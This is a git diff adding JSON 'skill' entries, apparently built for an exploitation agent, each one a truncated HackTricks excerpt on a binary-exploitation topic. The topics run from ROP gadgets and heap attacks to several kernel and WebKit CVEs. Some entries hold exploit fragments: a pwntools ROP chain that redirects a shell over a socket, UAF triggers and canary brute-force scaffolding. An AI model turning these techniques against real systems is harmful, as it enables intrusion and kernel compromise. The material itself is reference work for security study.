\ No newline at end of file
diff --git a/skills/binary_exploitation_0b6615e15696.json b/skills/binary_exploitation_0b6615e15696.json
new file mode 100644
index 0000000..b7d954b
--- /dev/null
+++ b/skills/binary_exploitation_0b6615e15696.json
@@ -0,0 +1,27 @@
+{
+ "id": "binary_exploitation_0b6615e15696",
+ "category": "binary-exploitation",
+ "title": "pwntools",
+ "description": "# PwnTools\n\n{{#include ../../../banners/hacktricks-training.md}}\n\n```\npip3 install pwntools\n```\n\n## Pwn asm\n\nGet **opcodes** from line or file.\n\n```\npwn asm \"jmp esp\"\npwn asm -i \n```\n\n**Can select:**\n\n- output type (raw,hex,string,elf)\n- output file context (16,32,64,linux,windows...)\n- avoid bytes (new lines, null, a list)\n- select encoder debug shellcode using gdb run the output\n\n## **Pwn checksec**\n\nChecksec script\n\n```\npwn checksec \n```\n\n## Pwn constgrep\n\n## Pwn cyclic\n",
+ "payloads": [
+ "# PwnTools",
+ "{{#include ../../../banners/hacktricks-training.md}}",
+ "pip3 install pwntools",
+ "## Pwn asm",
+ "Get **opcodes** from line or file.",
+ "pwn asm \"jmp esp\"",
+ "pwn asm -i ",
+ "**Can select:**",
+ "- output type (raw,hex,string,elf)",
+ "- output file context (16,32,64,linux,windows...)",
+ "- avoid bytes (new lines, null, a list)",
+ "- select encoder debug shellcode using gdb run the output",
+ "## **Pwn checksec**",
+ "Checksec script",
+ "pwn checksec "
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/binary-exploitation/basic-stack-binary-exploitation-methodology/tools/pwntools.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/binary_exploitation_0c0eb551ba35.json b/skills/binary_exploitation_0c0eb551ba35.json
new file mode 100644
index 0000000..bfbc06c
--- /dev/null
+++ b/skills/binary_exploitation_0c0eb551ba35.json
@@ -0,0 +1,27 @@
+{
+ "id": "binary_exploitation_0c0eb551ba35",
+ "category": "binary-exploitation",
+ "title": "ret2csu",
+ "description": "# Ret2csu\n\n{{#include ../../banners/hacktricks-training.md}}\n\n##\n\n## [https://www.scs.stanford.edu/brop/bittau-brop.pdf](https://www.scs.stanford.edu/brop/bittau-brop.pdf)Basic Information\n\n**ret2csu** is a hacking technique used when you're trying to take control of a program but can't find the **gadgets** you usually use to manipulate the program's behavior.\n\nWhen a program uses certain libraries (like libc), it has some built-in functions for managing how different pieces of the program talk ",
+ "payloads": [
+ "# Ret2csu",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "## [https://www.scs.stanford.edu/brop/bittau-brop.pdf](https://www.scs.stanford.edu/brop/bittau-brop.pdf)Basic Information",
+ "**ret2csu** is a hacking technique used when you're trying to take control of a program but can't find the **gadgets** you usually use to manipulate the program's behavior.",
+ "When a program uses certain libraries (like libc), it has some built-in functions for managing how different pieces of the program talk to each other. Among these functions are some hidden gems that can act as our missing gadgets, especially one called `__libc_csu_init`.",
+ "### The Magic Gadgets in \\_\\_libc_csu_init",
+ "In **`__libc_csu_init`**, there are two sequences of instructions (gadgets) to highlight:",
+ "1. The first sequence lets us set up values in several registers (rbx, rbp, r12, r13, r14, r15). These are like slots where we can store numbers or addresses we want to use later.",
+ "```armasm",
+ "pop rbx;",
+ "pop rbp;",
+ "pop r12;",
+ "pop r13;",
+ "pop r14;",
+ "pop r15;"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/binary-exploitation/rop-return-oriented-programing/ret2csu.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/binary_exploitation_103770044203.json b/skills/binary_exploitation_103770044203.json
new file mode 100644
index 0000000..ab5b231
--- /dev/null
+++ b/skills/binary_exploitation_103770044203.json
@@ -0,0 +1,27 @@
+{
+ "id": "binary_exploitation_103770044203",
+ "category": "binary-exploitation",
+ "title": "fast bin attack",
+ "description": "# Fast Bin Attack\n\n{{#include ../../banners/hacktricks-training.md}}\n\n## Basic Information\n\nFor more information about what is a fast bin check this page:\n\n\n{{#ref}}\nbins-and-memory-allocations.md\n{{#endref}}\n\nBecause the fast bin is a singly linked list, there are much less protections than in other bins and just **modifying an address in a freed fast bin** chunk is enough to be able to **allocate later a chunk in any memory address**.\n\nAs summary:\n\n```c\nptr0 = malloc(0x20);\nptr1 = malloc(0x20)",
+ "payloads": [
+ "# Fast Bin Attack",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "## Basic Information",
+ "For more information about what is a fast bin check this page:",
+ "{{#ref}}",
+ "bins-and-memory-allocations.md",
+ "{{#endref}}",
+ "Because the fast bin is a singly linked list, there are much less protections than in other bins and just **modifying an address in a freed fast bin** chunk is enough to be able to **allocate later a chunk in any memory address**.",
+ "As summary:",
+ "ptr0 = malloc(0x20);",
+ "ptr1 = malloc(0x20);",
+ "// Put them in fast bin (suppose tcache is full)",
+ "free(ptr0)",
+ "free(ptr1)",
+ "// Use-after-free"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/binary-exploitation/libc-heap/fast-bin-attack.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/binary_exploitation_11e30aebbb1b.json b/skills/binary_exploitation_11e30aebbb1b.json
new file mode 100644
index 0000000..a32bff4
--- /dev/null
+++ b/skills/binary_exploitation_11e30aebbb1b.json
@@ -0,0 +1,26 @@
+{
+ "id": "binary_exploitation_11e30aebbb1b",
+ "category": "binary-exploitation",
+ "title": "cet and shadow stack",
+ "description": "# CET & Shadow Stack\n\n{{#include ../../banners/hacktricks-training.md}}\n\n## Control Flow Enforcement Technology (CET)\n\n**CET** is a security feature implemented at the hardware level, designed to thwart common control-flow hijacking attacks such as **Return-Oriented Programming (ROP)** and **Jump-Oriented Programming (JOP)**. These types of attacks manipulate the execution flow of a program to execute malicious code or to chain together pieces of benign code in a way that performs a malicious ac",
+ "payloads": [
+ "# CET & Shadow Stack",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "## Control Flow Enforcement Technology (CET)",
+ "**CET** is a security feature implemented at the hardware level, designed to thwart common control-flow hijacking attacks such as **Return-Oriented Programming (ROP)** and **Jump-Oriented Programming (JOP)**. These types of attacks manipulate the execution flow of a program to execute malicious code or to chain together pieces of benign code in a way that performs a malicious action.",
+ "CET introduces two main features: **Indirect Branch Tracking (IBT)** and **Shadow Stack**.",
+ "- **IBT** ensures that indirect jumps and calls are made to valid targets, which are marked explicitly as legal destinations for indirect branches. This is achieved through the use of a new instruction set that marks valid targets, thus preventing attackers from diverting the control flow to arbitrary locations.",
+ "- **Shadow Stack** is a mechanism that provides integrity for return addresses. It keeps a secured, hidden copy of return addresses separate from the regular call stack. When a function returns, the return address is validated against the shadow stack, preventing attackers from overwriting return addresses on the stack to hijack the control flow.",
+ "## Shadow Stack",
+ "The **shadow stack** is a **dedicated stack used solely for storing return addresses**. It works alongside the regular stack but is protected and hidden from normal program execution, making it difficult for attackers to tamper with. The primary goal of the shadow stack is to ensure that any modifications to return addresses on the conventional stack are detected before they can be used, effectively mitigating ROP attacks.",
+ "## How CET and Shadow Stack Prevent Attacks",
+ "**ROP and JOP attacks** rely on the ability to hijack the control flow of an application by leveraging vulnerabilities that allow them to overwrite pointers or return addresses on the stack. By directing the flow to sequences of existing code gadgets or return-oriented programming gadgets, attackers can execute arbitrary code.",
+ "- **CET's IBT** feature makes these attacks significantly harder by ensuring that indirect branches can only jump to addresses that have been explicitly marked as valid targets. This makes it impossible for attackers to execute arbitrary gadgets spread across the binary.",
+ "- The **shadow stack**, on the other hand, ensures that even if an attacker can overwrite a return address on the normal stack, the **discrepancy will be detected** when comparing the corrupted address with the secure copy stored in the shadow stack upon returning from a function. If the addresses don't match, the program can terminate or take other security measures, preventing the attack from succeeding.",
+ "{{#include ../../banners/hacktricks-training.md}}"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/binary-exploitation/common-binary-protections-and-bypasses/cet-and-shadow-stack.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/binary_exploitation_13acba931cd2.json b/skills/binary_exploitation_13acba931cd2.json
new file mode 100644
index 0000000..31ca2c5
--- /dev/null
+++ b/skills/binary_exploitation_13acba931cd2.json
@@ -0,0 +1,27 @@
+{
+ "id": "binary_exploitation_13acba931cd2",
+ "category": "binary-exploitation",
+ "title": "common exploiting problems",
+ "description": "# Common Exploiting Problems\n\n{{#include ../banners/hacktricks-training.md}}\n\n## FDs in Remote Exploitation\n\nWhen sending an exploit to a remote server that calls **`system('/bin/sh')`** for example, this will be executed in the server process ofc, and `/bin/sh` will expect input from stdin (FD: `0`) and will print the output in stdout and stderr (FDs `1` and `2`). So the attacker won't be able to interact with the shell.\n\nA way to fix this is to suppose that when the server started it created t",
+ "payloads": [
+ "# Common Exploiting Problems",
+ "{{#include ../banners/hacktricks-training.md}}",
+ "## FDs in Remote Exploitation",
+ "When sending an exploit to a remote server that calls **`system('/bin/sh')`** for example, this will be executed in the server process ofc, and `/bin/sh` will expect input from stdin (FD: `0`) and will print the output in stdout and stderr (FDs `1` and `2`). So the attacker won't be able to interact with the shell.",
+ "A way to fix this is to suppose that when the server started it created the **FD number `3`** (for listening) and that then, your connection is going to be in the **FD number `4`**. Therefore, it's possible to use the syscall **`dup2`** to duplicate the stdin (FD 0) and the stdout (FD 1) in the FD 4 (the one of the connection of the attacker) so it'll make feasible to contact the shell once it's executed.",
+ "[**Exploit example from here**](https://ir0nstone.gitbook.io/notes/types/stack/exploiting-over-sockets/exploit):",
+ "```python",
+ "from pwn import *",
+ "elf = context.binary = ELF('./vuln')",
+ "p = remote('localhost', 9001)",
+ "rop = ROP(elf)",
+ "rop.raw('A' * 40)",
+ "rop.dup2(4, 0)",
+ "rop.dup2(4, 1)",
+ "rop.win()"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/binary-exploitation/common-exploiting-problems.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/binary_exploitation_146e4a69f0d6.json b/skills/binary_exploitation_146e4a69f0d6.json
new file mode 100644
index 0000000..568f0ff
--- /dev/null
+++ b/skills/binary_exploitation_146e4a69f0d6.json
@@ -0,0 +1,27 @@
+{
+ "id": "binary_exploitation_146e4a69f0d6",
+ "category": "binary-exploitation",
+ "title": "pixel bigwave bigo job timeout uaf kernel write",
+ "description": "# Pixel BigWave BIGO timeout race UAF \u2192 2KB kernel write from mediacodec\n\n{{#include ../../banners/hacktricks-training.md}}\n\n## TL;DR\n\n- From the SELinux-confined **mediacodec** context, `/dev/bigwave` (Pixel AV1 hardware accelerator) is reachable. A backlog of jobs makes `BIGO_IOCX_PROCESS` hit its **16s wait_for_completion_timeout()** and return while the worker thread concurrently dequeues the same inline `job` structure.\n- Closing the FD immediately frees `struct bigo_inst` (which embeds `st",
+ "payloads": [
+ "# Pixel BigWave BIGO timeout race UAF \u2192 2KB kernel write from mediacodec",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "## TL;DR",
+ "- From the SELinux-confined **mediacodec** context, `/dev/bigwave` (Pixel AV1 hardware accelerator) is reachable. A backlog of jobs makes `BIGO_IOCX_PROCESS` hit its **16s wait_for_completion_timeout()** and return while the worker thread concurrently dequeues the same inline `job` structure.",
+ "- Closing the FD immediately frees `struct bigo_inst` (which embeds `struct bigo_job`). The worker reconstructs `inst = container_of(job, ...)` and later uses freed fields such as **`job->regs`** inside `bigo_run_job()`, yielding a **Use-After-Free on the inline job/inst**.",
+ "- `bigo_pull_regs(core, job->regs)` performs `memcpy_fromio(regs, core->base, core->regs_size)`. By reclaiming the freed slab and overwriting `job->regs`, an attacker gets a **~2144-byte arbitrary kernel write** to a chosen address, with partial control of the bytes by pre-programming register values before the timeout.",
+ "## Attack surface mapping (SELinux \u2192 /dev reachability)",
+ "- Use tools like **DriverCartographer** to enumerate device nodes accessible from a given SELinux domain. Despite mediacodec\u2019s constrained policy (software decoders should stay in an isolated context), `/dev/bigwave` remained reachable, exposing a large attack surface to post-media-RCE code.",
+ "## Vulnerability: BIGO_IOCX_PROCESS timeout vs worker",
+ "- Flow: ioctl copies user register buffer into `job->regs`, queues the inline `job`, then `wait_for_completion_timeout(..., 16s)`. On timeout it tries to dequeue/cancel and returns to userspace.",
+ "- Meanwhile `bigo_worker_thread` may have just dequeued the same `job`:",
+ "inst = container_of(job, struct bigo_inst, job);",
+ "bigo_push_regs(core, job->regs);",
+ "bigo_pull_regs(core, job->regs); // memcpy_fromio(regs, core->base, core->regs_size)",
+ "*(u32 *)(job->regs + BIGO_REG_STAT) = status;"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/binary-exploitation/linux-kernel-exploitation/pixel-bigwave-bigo-job-timeout-uaf-kernel-write.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/binary_exploitation_16316d793188.json b/skills/binary_exploitation_16316d793188.json
new file mode 100644
index 0000000..435d5d7
--- /dev/null
+++ b/skills/binary_exploitation_16316d793188.json
@@ -0,0 +1,27 @@
+{
+ "id": "binary_exploitation_16316d793188",
+ "category": "binary-exploitation",
+ "title": "af unix msg oob uaf skb primitives",
+ "description": "# AF_UNIX MSG_OOB UAF & SKB-based kernel primitives\n\n{{#include ../../banners/hacktricks-training.md}}\n\n## TL;DR\n\n- Linux >=6.9 introduced a flawed `manage_oob()` refactor (`5aa57d9f2d53`) for AF_UNIX `MSG_OOB` handling. Stacked zero-length SKBs bypassed the logic that clears `u->oob_skb`, so a normal `recv()` could free the out-of-band SKB while the pointer remained live, leading to CVE-2025-38236.\n- Re-triggering `recv(..., MSG_OOB)` dereferences the dangling `struct sk_buff`. With `MSG_PEEK`,",
+ "payloads": [
+ "# AF_UNIX MSG_OOB UAF & SKB-based kernel primitives",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "## TL;DR",
+ "- Linux >=6.9 introduced a flawed `manage_oob()` refactor (`5aa57d9f2d53`) for AF_UNIX `MSG_OOB` handling. Stacked zero-length SKBs bypassed the logic that clears `u->oob_skb`, so a normal `recv()` could free the out-of-band SKB while the pointer remained live, leading to CVE-2025-38236.",
+ "- Re-triggering `recv(..., MSG_OOB)` dereferences the dangling `struct sk_buff`. With `MSG_PEEK`, the path `unix_stream_recv_urg() -> __skb_datagram_iter() -> copy_to_user()` becomes a stable 1-byte arbitrary kernel read; without `MSG_PEEK` the primitive increments `UNIXCB(oob_skb).consumed` at offset `0x44`, i.e., adds +4 GiB to the upper dword of any 64-bit value placed at offset `0x40` inside the reallocated object.",
+ "- By draining order-0/1 unmovable pages (page-table spray), force-freeing an SKB slab page into the buddy allocator, and reusing the physical page as a pipe buffer, the exploit forges SKB metadata in controlled memory to identify the dangling page and pivot the read primitive into `.data`, vmemmap, per-CPU, and page-table regions despite usercopy hardening.",
+ "- The same page can later be recycled as the top kernel-stack page of a freshly cloned thread. `CONFIG_RANDOMIZE_KSTACK_OFFSET` becomes an oracle: by probing the stack layout while `pipe_write()` blocks, the attacker waits until the spilled `copy_page_from_iter()` length (R14) lands at offset `0x40`, then fires the +4 GiB increment to corrupt the stack value.",
+ "- A self-looping `skb_shinfo()->frag_list` keeps the UAF syscall spinning in kernel space until a cooperating thread stalls `copy_from_iter()` (via `mprotect()` over a VMA containing a single `MADV_DONTNEED` hole). Breaking the loop releases the increment exactly when the stack target is live, inflating the `bytes` argument so `copy_page_from_iter()` writes past the pipe buffer page into the next physical page.",
+ "- By monitoring pipe-buffer PFNs and page tables with the read primitive, the attacker ensures the following page is a PTE page, converts the OOB copy into arbitrary PTE writes, and obtains unrestricted kernel read/write/execute. Chrome mitigated reachability by blocking `MSG_OOB` from renderers (`6711812`), and Linux fixed the logic flaw in `32ca245464e1` plus introduced `CONFIG_AF_UNIX_OOB` to make the feature optional.",
+ "## Root cause: `manage_oob()` assumes only one zero-length SKB",
+ "`unix_stream_read_generic()` expects every SKB returned by `manage_oob()` to have `unix_skb_len() > 0`. After `93c99f21db36`, `manage_oob()` skipped the `skb == u->oob_skb` cleanup path whenever it first removed a zero-length SKB left behind by `recv(MSG_OOB)`. The subsequent fix (`5aa57d9f2d53`) still advanced from the first zero-length SKB to `skb_peek_next()` without re-checking the length. With two consecutive zero-length SKBs, the function returned the second empty SKB; `unix_stream_read_generic()` then skipped it without calling `manage_oob()` again, so the true OOB SKB was dequeued and freed while `u->oob_skb` still pointed to it.",
+ "### Minimal trigger sequence",
+ "char byte;",
+ "int socks[2];",
+ "socketpair(AF_UNIX, SOCK_STREAM, 0, socks);"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/binary-exploitation/linux-kernel-exploitation/af-unix-msg-oob-uaf-skb-primitives.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/binary_exploitation_188b3ac6798e.json b/skills/binary_exploitation_188b3ac6798e.json
new file mode 100644
index 0000000..fbd97b6
--- /dev/null
+++ b/skills/binary_exploitation_188b3ac6798e.json
@@ -0,0 +1,27 @@
+{
+ "id": "binary_exploitation_188b3ac6798e",
+ "category": "binary-exploitation",
+ "title": "CVE 2020 27950 mach msg trailer t",
+ "description": "# CVE-2021-30807: IOMobileFrameBuffer OOB\n\n{{#include ../../banners/hacktricks-training.md}}\n\n\n## The Bug\n\nYou have a [great explanation of the vuln here](https://www.synacktiv.com/en/publications/ios-1-day-hunting-uncovering-and-exploiting-cve-2020-27950-kernel-memory-leak), but as summary:\n\nEvery Mach message the kernel receives ends with a **\"trailer\"**: a variable-length struct with metadata (seqno, sender token, audit token, context, access control data, labels...). The kernel **always rese",
+ "payloads": [
+ "# CVE-2021-30807: IOMobileFrameBuffer OOB",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "## The Bug",
+ "You have a [great explanation of the vuln here](https://www.synacktiv.com/en/publications/ios-1-day-hunting-uncovering-and-exploiting-cve-2020-27950-kernel-memory-leak), but as summary:",
+ "Every Mach message the kernel receives ends with a **\"trailer\"**: a variable-length struct with metadata (seqno, sender token, audit token, context, access control data, labels...). The kernel **always reserves the largest possible trailer** (MAX_TRAILER_SIZE) in the message buffer, but **only initializes some fields**, then later **decides which trailer size to return** based on **user-controlled receive options**.",
+ "These are the trailer relevant structs:",
+ "typedef struct{",
+ "mach_msg_trailer_type_t msgh_trailer_type;",
+ "mach_msg_trailer_size_t msgh_trailer_size;",
+ "} mach_msg_trailer_t;",
+ "typedef struct{",
+ "mach_msg_trailer_type_t msgh_trailer_type;",
+ "mach_msg_trailer_size_t msgh_trailer_size;",
+ "mach_port_seqno_t msgh_seqno;",
+ "security_token_t msgh_sender;"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/binary-exploitation/ios-exploiting/CVE-2020-27950-mach_msg_trailer_t.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/binary_exploitation_199822d17fa4.json b/skills/binary_exploitation_199822d17fa4.json
new file mode 100644
index 0000000..2daf671
--- /dev/null
+++ b/skills/binary_exploitation_199822d17fa4.json
@@ -0,0 +1,27 @@
+{
+ "id": "binary_exploitation_199822d17fa4",
+ "category": "binary-exploitation",
+ "title": "house of force",
+ "description": "# House of Force\n\n{{#include ../../banners/hacktricks-training.md}}\n\n## Basic Information\n\n### Code\n\n- This technique was patched ([**here**](https://sourceware.org/git/?p=glibc.git;a=commitdiff;h=30a17d8c95fbfb15c52d1115803b63aaa73a285c)) and produces this error: `malloc(): corrupted top size`\n - You can try the [**code from here**](https://guyinatuxedo.github.io/41-house_of_force/house_force_exp/index.html) to test it if you want.\n\n### Goal\n\n- The goal of this attack is to be able to allocate",
+ "payloads": [
+ "# House of Force",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "## Basic Information",
+ "### Code",
+ "- This technique was patched ([**here**](https://sourceware.org/git/?p=glibc.git;a=commitdiff;h=30a17d8c95fbfb15c52d1115803b63aaa73a285c)) and produces this error: `malloc(): corrupted top size`",
+ "- You can try the [**code from here**](https://guyinatuxedo.github.io/41-house_of_force/house_force_exp/index.html) to test it if you want.",
+ "### Goal",
+ "- The goal of this attack is to be able to allocate a chunk in a specific address.",
+ "### Requirements",
+ "- An overflow that allows to overwrite the size of the top chunk header (e.g. -1).",
+ "- Be able to control the size of the heap allocation",
+ "### Attack",
+ "If an attacker wants to allocate a chunk in the address P to overwrite a value here. He starts by overwriting the top chunk size with `-1` (maybe with an overflow). This ensures that malloc won't be using mmap for any allocation as the Top chunk will always have enough space.",
+ "Then, calculate the distance between the address of the top chunk and the target space to allocate. This is because a malloc with that size will be performed in order to move the top chunk to that position. This is how the difference/size can be easily calculated:",
+ "// From https://github.com/shellphish/how2heap/blob/master/glibc_2.27/house_of_force.c#L59C2-L67C5"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/binary-exploitation/libc-heap/house-of-force.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/binary_exploitation_1da41b63ec77.json b/skills/binary_exploitation_1da41b63ec77.json
new file mode 100644
index 0000000..7d267e3
--- /dev/null
+++ b/skills/binary_exploitation_1da41b63ec77.json
@@ -0,0 +1,27 @@
+{
+ "id": "binary_exploitation_1da41b63ec77",
+ "category": "binary-exploitation",
+ "title": "adreno a7xx sds rb priv bypass gpu smmu kernel rw",
+ "description": "# Adreno A7xx SDS->RB privilege bypass (GPU SMMU takeover to Kernel R/W)\n\n{{#include ../../banners/hacktricks-training.md}}\n\nThis page abstracts an in-the-wild Adreno A7xx microcode logic bug (CVE-2025-21479) into reproducible exploitation techniques: abusing IB-level masking in Set Draw State (SDS) to execute privileged GPU packets from an unprivileged app, pivoting to GPU SMMU takeover and then to a fast, stable kernel R/W via a dirty-pagetable trick.\n\n- Affected: Qualcomm Adreno A7xx GPU firm",
+ "payloads": [
+ "# Adreno A7xx SDS->RB privilege bypass (GPU SMMU takeover to Kernel R/W)",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "This page abstracts an in-the-wild Adreno A7xx microcode logic bug (CVE-2025-21479) into reproducible exploitation techniques: abusing IB-level masking in Set Draw State (SDS) to execute privileged GPU packets from an unprivileged app, pivoting to GPU SMMU takeover and then to a fast, stable kernel R/W via a dirty-pagetable trick.",
+ "- Affected: Qualcomm Adreno A7xx GPU firmware prior to a microcode fix that changed masking of register $12 from 0x3 to 0x7.",
+ "- Primitive: Execute privileged CP packets (e.g., CP_SMMU_TABLE_UPDATE) from SDS, which is user-controlled.",
+ "- Outcome: Arbitrary physical/virtual kernel memory R/W, SELinux disable, root.",
+ "- Prereq: Ability to create a KGSL GPU context and submit command buffers that enter SDS (normal app capability).",
+ "## Background: IB levels, SDS and the $12 mask",
+ "- The kernel maintains a ringbuffer (RB=IB0). Userspace submits IB1 via CP_INDIRECT_BUFFER, chaining to IB2/IB3.",
+ "- SDS is a special command stream entered via CP_SET_DRAW_STATE:",
+ "- A6xx: SDS is treated as IB3",
+ "- A7xx: SDS moved to IB4",
+ "- Microcode tracks the current IB level in register $12 and gates privileged packets so they are only accepted when the effective level corresponds to IB0 (kernel RB).",
+ "- Bug: A7xx microcode kept masking $12 with 0x3 (2 bits) instead of 0x7 (3 bits). Since IB4 & 0x3 == 0, SDS was misidentified as IB0, allowing privileged packets from user-controlled SDS.",
+ "Why it matters:"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/binary-exploitation/linux-kernel-exploitation/adreno-a7xx-sds-rb-priv-bypass-gpu-smmu-kernel-rw.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/binary_exploitation_1eb60e33db08.json b/skills/binary_exploitation_1eb60e33db08.json
new file mode 100644
index 0000000..0f6cf95
--- /dev/null
+++ b/skills/binary_exploitation_1eb60e33db08.json
@@ -0,0 +1,27 @@
+{
+ "id": "binary_exploitation_1eb60e33db08",
+ "category": "binary-exploitation",
+ "title": "webkit dfg store barrier uaf angle oob",
+ "description": "# WebKit DFG Store-Barrier UAF + ANGLE PBO OOB (iOS 26.1)\n\n{{#include ../../banners/hacktricks-training.md}}\n\n## Summary\n- **DFG Store Barrier bug (CVE-2025-43529)**: In `DFGStoreBarrierInsertionPhase.cpp`, a **Phi node marked escaped while its Upsilon inputs are not** causes the phase to **skip inserting a write barrier** on subsequent object stores. Under GC pressure this lets JSC free still-reachable objects \u2192 **use-after-free**.\n- **Exploit target**: Force a **Date** object to materialize a ",
+ "payloads": [
+ "# WebKit DFG Store-Barrier UAF + ANGLE PBO OOB (iOS 26.1)",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "## Summary",
+ "- **DFG Store Barrier bug (CVE-2025-43529)**: In `DFGStoreBarrierInsertionPhase.cpp`, a **Phi node marked escaped while its Upsilon inputs are not** causes the phase to **skip inserting a write barrier** on subsequent object stores. Under GC pressure this lets JSC free still-reachable objects \u2192 **use-after-free**.",
+ "- **Exploit target**: Force a **Date** object to materialize a butterfly (e.g., `a[0] = 1.1`) so the butterfly is freed, then **reclaimed** as array element storage to build boxed/unboxed confusion \u2192 `addrof`/`fakeobj` primitives.",
+ "- **ANGLE Metal PBO bug (CVE-2025-14174)**: The Metal backend allocates the PBO staging buffer using `UNPACK_IMAGE_HEIGHT` instead of the real texture height. Supplying a tiny unpack height then issuing a large `texImage2D` causes a **staging-buffer OOB write** (~240KB in the PoC below).",
+ "- **PAC blockers on arm64e (iOS 26.1)**: TypedArray `m_vector` and JSArray `butterfly` are PAC-signed; forging fake objects with attacker-chosen pointers crashes with `EXC_BAD_ACCESS`/`EXC_ARM_PAC`. Only reusing **already-signed** butterflies (boxed/unboxed reinterpretation) works.",
+ "## Triggering the DFG missing barrier \u2192 UAF",
+ "function triggerUAF(flag, allocCount) {",
+ "const A = {p0: 0x41414141, p1: 1.1, p2: 2.2};",
+ "arr[arr_index] = A; // Tenure A in old space",
+ "const a = new Date(1111); a[0] = 1.1; // Force Date butterfly",
+ "// GC pressure",
+ "for (let j = 0; j < allocCount; ++j) forGC.push(new ArrayBuffer(0x800000));",
+ "const b = {p0: 0x42424242, p1: 1.1};"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/binary-exploitation/ios-exploiting/webkit-dfg-store-barrier-uaf-angle-oob.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/binary_exploitation_230417cb7d6e.json b/skills/binary_exploitation_230417cb7d6e.json
new file mode 100644
index 0000000..d585e78
--- /dev/null
+++ b/skills/binary_exploitation_230417cb7d6e.json
@@ -0,0 +1,27 @@
+{
+ "id": "binary_exploitation_230417cb7d6e",
+ "category": "binary-exploitation",
+ "title": "bf forked stack canaries",
+ "description": "# BF Forked & Threaded Stack Canaries\n\n{{#include ../../../banners/hacktricks-training.md}}\n\n**If you are facing a binary protected by a canary and PIE (Position Independent Executable) you probably need to find a way to bypass them.**\n\n.png>)\n\n> [!TIP]\n> Note that **`checksec`** might not find that a binary is protected by a canary if this was statically compiled and it's not capable to identify the function.\\\n> However, you can manually notice this if you find t",
+ "payloads": [
+ "# BF Forked & Threaded Stack Canaries",
+ "{{#include ../../../banners/hacktricks-training.md}}",
+ "**If you are facing a binary protected by a canary and PIE (Position Independent Executable) you probably need to find a way to bypass them.**",
+ ".png>)",
+ "> [!TIP]",
+ "> Note that **`checksec`** might not find that a binary is protected by a canary if this was statically compiled and it's not capable to identify the function.\\",
+ "> However, you can manually notice this if you find that a value is saved in the stack at the beginning of a function call and this value is checked before exiting.",
+ "## Brute force Canary",
+ "The best way to bypass a simple canary is if the binary is a program **forking child processes every time you establish a new connection** with it (network service), because every time you connect to it **the same canary will be used**.",
+ "Then, the best way to bypass the canary is just to **brute-force it char by char**, and you can figure out if the guessed canary byte was correct checking if the program has crashed or continues its regular flow. In this example the function **brute-forces an 8 Bytes canary (x64)** and distinguish between a correct guessed byte and a bad byte just **checking** if a **response** is sent back by the server (another way in **other situation** could be using a **try/except**):",
+ "### Example 1",
+ "This example is implemented for 64bits but could be easily implemented for 32 bits.",
+ "```python",
+ "from pwn import *",
+ "def connect():"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/binary-exploitation/common-binary-protections-and-bypasses/stack-canaries/bf-forked-stack-canaries.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/binary_exploitation_28bf69dc58c6.json b/skills/binary_exploitation_28bf69dc58c6.json
new file mode 100644
index 0000000..86536c9
--- /dev/null
+++ b/skills/binary_exploitation_28bf69dc58c6.json
@@ -0,0 +1,27 @@
+{
+ "id": "binary_exploitation_28bf69dc58c6",
+ "category": "binary-exploitation",
+ "title": "integer overflow and underflow",
+ "description": "# Integer Overflow\n\n{{#include ../banners/hacktricks-training.md}}\n\n## Basic Information\n\nAt the heart of an **integer overflow** is the limitation imposed by the **size** of data types in computer programming and the **interpretation** of the data.\n\nFor example, an **8-bit unsigned integer** can represent values from **0 to 255**. If you attempt to store the value 256 in an 8-bit unsigned integer, it wraps around to 0 due to the limitation of its storage capacity. Similarly, for a **16-bit unsi",
+ "payloads": [
+ "# Integer Overflow",
+ "{{#include ../banners/hacktricks-training.md}}",
+ "## Basic Information",
+ "At the heart of an **integer overflow** is the limitation imposed by the **size** of data types in computer programming and the **interpretation** of the data.",
+ "For example, an **8-bit unsigned integer** can represent values from **0 to 255**. If you attempt to store the value 256 in an 8-bit unsigned integer, it wraps around to 0 due to the limitation of its storage capacity. Similarly, for a **16-bit unsigned integer**, which can hold values from **0 to 65,535**, adding 1 to 65,535 will wrap the value back to 0.",
+ "Moreover, an **8-bit signed integer** can represent values from **-128 to 127**. This is because one bit is used to represent the sign (positive or negative), leaving 7 bits to represent the magnitude. The most negative number is represented as **-128** (binary `10000000`), and the most positive number is **127** (binary `01111111`).",
+ "Max values for common integer types:",
